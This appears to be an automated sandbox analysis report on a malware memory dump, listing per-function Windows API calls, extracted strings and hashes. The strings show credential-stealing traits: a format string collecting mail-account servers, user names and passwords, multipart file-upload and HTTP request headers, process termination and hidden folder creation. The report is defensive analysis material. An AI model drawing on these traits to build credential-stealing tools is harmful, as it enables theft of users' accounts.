Instruction ID: 7225a0b3194f5b0ab664a511b97df8f4c73d2a251d87d258b0d252a88848c9fc
Opcode Fuzzy Hash: ced4a1b1c72748c95909976816aeccb03df79de874f0d21626c2282a5231ca15
Instruction Fuzzy Hash: 5321D171D40218BBDB109FA8CC85FDE7B78FF44358F14402DF905A2210D7708D849B92

Uniqueness

Uniqueness Score: -1.00%

Function 009C3166, Relevance: 10.6, APIs: 7, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 009C317E
lstrcmpiW.KERNEL32(00000000,0065002E), ref: 009C31B5
lstrcmpiW.KERNEL32(?,0064002E), ref: 009C31CA
lstrlenW.KERNEL32(?), ref: 009C31D1
CloseHandle.KERNEL32(?), ref: 009C31F9
DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 009C3225
RtlLeaveCriticalSection.NTDLL(00000000), ref: 009C3242

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: 871f9bcc4963bccbe5590bbf4fde9cd5eddadc8bf14ca7b2e85c5e9d9da286ff
Instruction ID: e02fbf4d80b6d694dfc583e313b75d4c6425ef6990cb36e204cfcb16b2ca10bc
Opcode Fuzzy Hash: 871f9bcc4963bccbe5590bbf4fde9cd5eddadc8bf14ca7b2e85c5e9d9da286ff
Instruction Fuzzy Hash: F1218E71A15305AFDF10AFB5DD84FAB7BBCAF44340B148029E502E2151EB30EA85EB61

Uniqueness

Uniqueness Score: -1.00%

Function 009CE9BE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 009CE9CF
LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009CEA69
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009CEA74

Strings

t, xrefs: 009CE9CF
NTDLL.DLL, xrefs: 009CE9CA
NTDSAPI.DLL, xrefs: 009CEA62

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL$t
API String ID: 2140536961-793121975
Opcode ID: 4f34ec240898d27bdd76f689dcf2ff7084c8e6b1846bd59b90753b4c39cf5b7d
Instruction ID: ab766b261c5b40914d742901d2d477f1d803f4db3d1a246a54fb005f16987c44
Opcode Fuzzy Hash: 4f34ec240898d27bdd76f689dcf2ff7084c8e6b1846bd59b90753b4c39cf5b7d
Instruction Fuzzy Hash: 4D318D719093028FDB14CF25C444B6BBBE4FF94319F14496EE88AC7251E770D989CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009C4344, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(009B436A,00000000,009DE260,009DE280,?,?,009B436A,009BAB0F,009DE260), ref: 009C4354
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 009C436A
lstrlen.KERNEL32(009BAB0F,?,?,009B436A,009BAB0F,009DE260), ref: 009C4372
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C437E
lstrcpy.KERNEL32(009DE260,009B436A), ref: 009C4394
HeapFree.KERNEL32(00000000,00000000,?,?,009B436A,009BAB0F,009DE260), ref: 009C43E8
HeapFree.KERNEL32(00000000,009DE260,?,?,009B436A,009BAB0F,009DE260), ref: 009C43F7

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: 89d5c0b128351238ef246336accc4e46b6b602332bdea48632d8b0ae2fcd19d8
Instruction ID: 1a8f41e118a192be1862439c26124d21d447c277e20c14cf33d4960b1b334b9d
Opcode Fuzzy Hash: 89d5c0b128351238ef246336accc4e46b6b602332bdea48632d8b0ae2fcd19d8
Instruction Fuzzy Hash: 42212931619284BFEB224F68DC44F6A7F6AEF96340F04405AE48597261C7719C56D760

Uniqueness

Uniqueness Score: -1.00%

Function 009B86ED, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000001,77E2EB70), ref: 009B870D

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

wsprintfA.USER32 ref: 009B8737

Part of subcall function 009CA1FF: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,009D470F), ref: 009CA215
Part of subcall function 009CA1FF: wsprintfA.USER32 ref: 009CA23D
Part of subcall function 009CA1FF: lstrlen.KERNEL32(?), ref: 009CA24C
Part of subcall function 009CA1FF: wsprintfA.USER32 ref: 009CA28C
Part of subcall function 009CA1FF: wsprintfA.USER32 ref: 009CA2C1
Part of subcall function 009CA1FF: memcpy.NTDLL(00000000,?,?), ref: 009CA2CE
Part of subcall function 009CA1FF: memcpy.NTDLL(00000008,009D83E4,00000002,00000000,?,?), ref: 009CA2E3
Part of subcall function 009CA1FF: wsprintfA.USER32 ref: 009CA306

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 009B87AC

Part of subcall function 009D5E4D: RtlEnterCriticalSection.NTDLL(06288D20), ref: 009D5E63
Part of subcall function 009D5E4D: RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009D5E7E

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 009B8794
HeapFree.KERNEL32(00000000,?), ref: 009B87A0

Strings

Content-Type: application/octet-stream, xrefs: 009B8729
Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 009B8731

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: 06573fb7b89513f42969639cdb7bd2f49b2e740b33744b17a8dadcb4a7ff7f57
Instruction ID: 636691925afc5057308d4e7bcf5561cb18c81ea7e004ed59d0883b45f7cbf1f4
Opcode Fuzzy Hash: 06573fb7b89513f42969639cdb7bd2f49b2e740b33744b17a8dadcb4a7ff7f57
Instruction Fuzzy Hash: 79214876841249BBCF119F95DC85CCFBF79FF98314F104426F915A6220DB718A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C61ED, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 72stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,74785520,?,00000000,?,?,009CF520,?,00000000,?,00000000,00000000,?,?,?,?), ref: 009C61FE

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Part of subcall function 009C6635: memset.NTDLL ref: 009C663D

Part of subcall function 009B7D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,009C1117), ref: 009B7D13
Part of subcall function 009B7D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 009B7D71
Part of subcall function 009B7D07: lstrcpy.KERNEL32(00000000,00000000), ref: 009B7D81

lstrcpy.KERNEL32(00000038,?), ref: 009C6239

Strings

Host:, xrefs: 009C6257
Accept-Encoding:, xrefs: 009C6261
GET, xrefs: 009C624D
User-Agent:, xrefs: 009C626B
Connection:, xrefs: 009C6275

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
API String ID: 3405161297-3467890120
Opcode ID: fae48dc6855df7def236b64c7c669a4fbfd383c91dc79f4bdc2feada955c132a
Instruction ID: 5ccce007e01e96a988249a718e3c3bd766d484db8795114cff74241ce46b5322
Opcode Fuzzy Hash: fae48dc6855df7def236b64c7c669a4fbfd383c91dc79f4bdc2feada955c132a
Instruction Fuzzy Hash: 5411C172A40104BA8B007FB5DE96FAF7BADEFC4798700403AF811E2242CA74CA109262

Uniqueness

Uniqueness Score: -1.00%

Function 009C6572, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,009C2EC9,?), ref: 009C65B3
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,009C2EC9,?,00000000,?,00000000,?,?), ref: 009C6626

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: 628a2aa19272571861436e5f1eee7ee7981d9be760921fd17a2790cdaa318531
Instruction ID: aea1816f088a8227cb92153eede6135d1582c4924847e9f6ea1b1672cf3fa20b
Opcode Fuzzy Hash: 628a2aa19272571861436e5f1eee7ee7981d9be760921fd17a2790cdaa318531
Instruction Fuzzy Hash: CF1123315EA214BFD3312B61EC4DFAF3F5CEB857A0F10451AF202950E2DA624C88D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 009CA378, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009B1791: lstrlen.KERNEL32(00000000), ref: 009B17F8
Part of subcall function 009B1791: sprintf.NTDLL ref: 009B1819

lstrlen.KERNEL32(00000000,00000000,747C81D0,00000000,?,?,009D4BA0,00000000,06288D60), ref: 009CA3A3
lstrlen.KERNEL32(?,?,?,009D4BA0,00000000,06288D60), ref: 009CA3AB

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

strcpy.NTDLL ref: 009CA3C2
lstrcat.KERNEL32(00000000,?), ref: 009CA3CD

Part of subcall function 009C1250: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,009CA3DC,00000000,?,?,?,009D4BA0,00000000,06288D60), ref: 009C1267

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,009D4BA0,00000000,06288D60), ref: 009CA3EA

Part of subcall function 009C530B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,009CA3F6,00000000,?,?,009D4BA0,00000000,06288D60), ref: 009C5315
Part of subcall function 009C530B: _snprintf.NTDLL ref: 009C5373

Strings

=, xrefs: 009CA3E4

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 0d3468ce20455a7912041c6d8678279298bf20df9233050f6cf03c88abbecb4a
Instruction ID: f56841e35cfe5629d8b54340b1b7a71c60f62bc36f18d6a74aa529f24ede3b7a
Opcode Fuzzy Hash: 0d3468ce20455a7912041c6d8678279298bf20df9233050f6cf03c88abbecb4a
Instruction Fuzzy Hash: D711E333E051246B46127BB49C89FAF7BAD9EC57A8305401EFA04A7212DE74DC0297E7

Uniqueness

Uniqueness Score: -1.00%

Function 009B6229, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 009B625A
wcstombs.NTDLL ref: 009B626B

Part of subcall function 009B80B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,009B6281,00000000), ref: 009B80C8
Part of subcall function 009B80B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,009B6281,00000000), ref: 009B80D7

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 009B628C
TerminateProcess.KERNEL32(00000000,00000000), ref: 009B629B
CloseHandle.KERNEL32(00000000), ref: 009B62A2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009B62B1
WaitForSingleObject.KERNEL32(00000000), ref: 009B62C1

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 26ea3b76d0b739c4d95e12415319906d4770b15605aee32dfc9f2f1182763467
Instruction ID: 28105aab80652c86b6d63c62cc0b5871199543b04975846df149cefb7145936c
Opcode Fuzzy Hash: 26ea3b76d0b739c4d95e12415319906d4770b15605aee32dfc9f2f1182763467
Instruction Fuzzy Hash: F911EF31196615BBE7105B55DD49BEB7BADFF04351F040012FA04E61A1CBB5AC94EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C1E61, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(009B45A1,00000000,00000000,00000000,?,?,009D11A1,009B45A1,00000000), ref: 009C1E7C
lstrlen.KERNEL32( | "%s" | %u,?,?,009D11A1,009B45A1,00000000), ref: 009C1E87
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 009C1E98

Part of subcall function 009BAB88: GetLocalTime.KERNEL32(?,?,?,?,009C201B,00000000,00000001), ref: 009BAB92
Part of subcall function 009BAB88: wsprintfA.USER32 ref: 009BABC5

wsprintfA.USER32 ref: 009C1EBB

Part of subcall function 009B9A6E: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,009C1EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 009B9A8C
Part of subcall function 009B9A6E: wsprintfA.USER32 ref: 009B9AAA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 009C1EEC

Strings

| "%s" | %u, xrefs: 009C1E7E, 009C1E83, 009C1EB6

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: 132bf094573768a31aada0f8861268758f0ba2c2c938b2998ac81a0b5f6b582d
Instruction ID: 5b24cffa07350fb18c632e9b329ced9ccce2a41617a0b666ea5018800dda4d3c
Opcode Fuzzy Hash: 132bf094573768a31aada0f8861268758f0ba2c2c938b2998ac81a0b5f6b582d
Instruction Fuzzy Hash: 8111E031951118BFDB109B69DC48EAB7BADEB85364B100026FC08D3121DA318D91EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C3BE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 009C3C05
RtlEnterCriticalSection.NTDLL(009DE268), ref: 009C3C17
RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009C3C2A
lstrcmpi.KERNEL32(009DE280,00000000), ref: 009C3C4B
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009B6BE5,00000000), ref: 009C3C5F

Strings

Main, xrefs: 009C3BFD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: d9722ff67b7dae8db4898c47a6cbaa6a6031a6f232935defbef5a3635d9770b1
Instruction ID: 9bb2bb8faf2a9587dda3596fc3917e2eb2de513c5e2b4c780e538cba8da370f0
Opcode Fuzzy Hash: d9722ff67b7dae8db4898c47a6cbaa6a6031a6f232935defbef5a3635d9770b1
Instruction Fuzzy Hash: 2911E231985208AFDB14DF29C849F9EB7ACFF05324F04C22EE955A7250C7349E41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009CC747, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

lstrcpy.KERNEL32(-000000FC,00000000), ref: 009CC781
CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,009BEF96,?,?,?), ref: 009CC793
GetTickCount.KERNEL32 ref: 009CC79E
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,009BEF96,?,?,?), ref: 009CC7AA
lstrcpy.KERNEL32(00000000), ref: 009CC7C4

Strings

\Low, xrefs: 009CC773

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 3dfdb2e2606353237639a581a74140bf317ec27ede36dac1077c00e7e4e59178
Instruction ID: a5baf660428b452f157484611ae4e6ccaddb4ea477f5f3f4c266df6e40cf49b3
Opcode Fuzzy Hash: 3dfdb2e2606353237639a581a74140bf317ec27ede36dac1077c00e7e4e59178
Instruction Fuzzy Hash: 6101F171A965206BD2116B79DC4CFAF7B9CDF42742F01002AF604E35A1CB28DD41CABA

Uniqueness

Uniqueness Score: -1.00%

Function 009CA67C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 009CA693

Part of subcall function 009C3587: wcstombs.NTDLL ref: 009C3645

lstrlen.KERNEL32(?,?,?,?,?,009D08C4,?,?), ref: 009CA6B6
lstrlen.KERNEL32(?,?,?,?,009D08C4,?,?), ref: 009CA6C0
memcpy.NTDLL(?,?,00004000,?,?,009D08C4,?,?), ref: 009CA6D1
HeapFree.KERNEL32(00000000,?,?,?,?,009D08C4,?,?), ref: 009CA6F3

Strings

Access-Control-Allow-Origin:, xrefs: 009CA681

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID: Access-Control-Allow-Origin:
API String ID: 1256246205-3194369251
Opcode ID: bd74104d25f7b006440921ce3225b2eecd5aa643af75b6c542d1f68ef2e63675
Instruction ID: c19b53adc9d01dc6bf1975f336fcbf265d600d6f8e7a32828dbb9d30ad057c41
Opcode Fuzzy Hash: bd74104d25f7b006440921ce3225b2eecd5aa643af75b6c542d1f68ef2e63675
Instruction Fuzzy Hash: 3A11ED76D50208EFCB109F64DC45F9EBBB8FB94364F208029F90AA3260D7319D40EB26

Uniqueness

Uniqueness Score: -1.00%

Function 009D427B, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(009DE220,009BC8D3,?,00000000), ref: 009D427F
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00000000), ref: 009D4293
GetProcAddress.KERNEL32(00000000), ref: 009D429A

Strings

t, xrefs: 009D4293
NTDLL.DLL, xrefs: 009D428E
LdrRegisterDllNotification, xrefs: 009D4289

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL$t
API String ID: 3310240892-4288466594
Opcode ID: 75dfdf0230fbbea17d13d8431c731d9898e05ef5a51c3427a2a9aa4d6eb927a7
Instruction ID: b976b12c6cd185f856519321183192aa4f34dbeaf0c1d050f2fe89d2f84963c1
Opcode Fuzzy Hash: 75dfdf0230fbbea17d13d8431c731d9898e05ef5a51c3427a2a9aa4d6eb927a7
Instruction Fuzzy Hash: 1B019E706D93019FC7509F7A9E4AB16BBE9AB45309B11C07BE649CB3A1DB70C885CF11

Uniqueness

Uniqueness Score: -1.00%

Function 009C1B2B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,009C1372,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?,00000001), ref: 009D135A
Part of subcall function 009D134B: mbstowcs.NTDLL ref: 009D1376

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,009BA164,?), ref: 009C1B50
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C1B62
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,009BA164,?), ref: 009C1B7F
lstrlenW.KERNEL32(00000000,?,?,009BA164,?), ref: 009C1B8B
HeapFree.KERNEL32(00000000,00000000,?,?,009BA164,?), ref: 009C1B9F

Strings

%APPDATA%\Microsoft\, xrefs: 009C1B30

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: ee72f036e8bf0512d317512d3922a0310586a07ad6e5e64e7c25237d69229561
Instruction ID: 57374f7f3f22fdadbb2110773553213de4aed31e6f33f820fe14cb78e504b941
Opcode Fuzzy Hash: ee72f036e8bf0512d317512d3922a0310586a07ad6e5e64e7c25237d69229561
Instruction Fuzzy Hash: A001DF325AA214BFD3119F98DC48FAF77ACEF45304F004012F50197261CBB09D45DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009C63E9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000000,747DF720,?,009BA894,00000000,?,?,?,009D25B8), ref: 009C640D
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,009BA894,00000000,?,?,?,009D25B8), ref: 009C6421
GetProcAddress.KERNEL32(00000000), ref: 009C6428

Strings

t, xrefs: 009C6421
LdrUnregisterDllNotification, xrefs: 009C6417
NTDLL.DLL, xrefs: 009C641C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL$t
API String ID: 3310240892-805403502
Opcode ID: ca5d965b2aee3f8d969f6c722e2315f9a4a223ec8003de42fd012b6d5ea239f8
Instruction ID: a1293237c047edf7d075693c0fc7e3fc86f9da45804e2f5db56e29023b8ea383
Opcode Fuzzy Hash: ca5d965b2aee3f8d969f6c722e2315f9a4a223ec8003de42fd012b6d5ea239f8
Instruction Fuzzy Hash: D601A2756452009FC714AF29EC88F26B7ECEB89304314846EE116973B1CA31AC81CB16

Uniqueness

Uniqueness Score: -1.00%

Function 009C1647, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(142A03F6), ref: 009C175E
lstrlen.KERNEL32(142903F0), ref: 009C176C

Part of subcall function 009C50B0: lstrlen.KERNEL32(?,00000104,?,00000000,009C1744,142D03E9,?), ref: 009C50BB
Part of subcall function 009C50B0: lstrcpy.KERNEL32(00000000,?), ref: 009C50D7

Strings

POP3, xrefs: 009C1802
SMTP, xrefs: 009C17F4
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 009C181C
IMAP, xrefs: 009C1809, 009C181B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: e87b17e40ad695b14137fc3bfbe92f31e61c8959a2d1962114da59cc2b39ee2b
Instruction ID: 5e534a66718bdfeb5664190985d64da9502ba303bd28bc0e8874d104f1df382c
Opcode Fuzzy Hash: e87b17e40ad695b14137fc3bfbe92f31e61c8959a2d1962114da59cc2b39ee2b
Instruction Fuzzy Hash: 2D713871E00119AFCB21DFA5C880FEEBBB8AF49704F11416EF905A3252D734DA408F96

Uniqueness

Uniqueness Score: -1.00%

Function 009CC50E, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

GetLastError.KERNEL32(?,?,?,00001000,?,009DE130,747DF750), ref: 009CC58F
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,009DE130,747DF750), ref: 009CC614
CloseHandle.KERNEL32(00000000,?,009DE130,747DF750), ref: 009CC62E
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,009DE130,747DF750), ref: 009CC663

Part of subcall function 009C408E: RtlReAllocateHeap.NTDLL(00000000,?,?,009C804C), ref: 009C409E

WaitForSingleObject.KERNEL32(?,00000064,?,009DE130,747DF750), ref: 009CC6E5
CloseHandle.KERNEL32(F0FFC983,?,009DE130,747DF750), ref: 009CC70C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: a23d1df014af6c89718dba01ae1c4a04fa6e5410954052f67ea5be3fc04bfd2a
Instruction ID: f1549281677407864663d6bf8fcb886062ea04ed1673374ed152f7e2909d3a85
Opcode Fuzzy Hash: a23d1df014af6c89718dba01ae1c4a04fa6e5410954052f67ea5be3fc04bfd2a
Instruction Fuzzy Hash: 648117B1D0021AEFDB10DF98CA84BAEBBB5FF08300F144459E909AB251D731AD41DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B991D, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdef287aa69d24ad67c00ea02e552596c2e80bf11f82d705b8de0f22b0cdb2de
Instruction ID: c287fa28bd5a64332b785030d77f77aa91c220a193aea51e9c9980ebb435a2ca
Opcode Fuzzy Hash: fdef287aa69d24ad67c00ea02e552596c2e80bf11f82d705b8de0f22b0cdb2de
Instruction Fuzzy Hash: BB4105715547049FC7209F298D85AABB7E8FB84330F104A2EF2A6C72D0D7709844DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D0A16, Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

memset.NTDLL ref: 009D0A61
RtlEnterCriticalSection.NTDLL(00000008), ref: 009D0AD9
RtlLeaveCriticalSection.NTDLL(?), ref: 009D0AF1
GetLastError.KERNEL32(009C209D,?,?), ref: 009D0B09
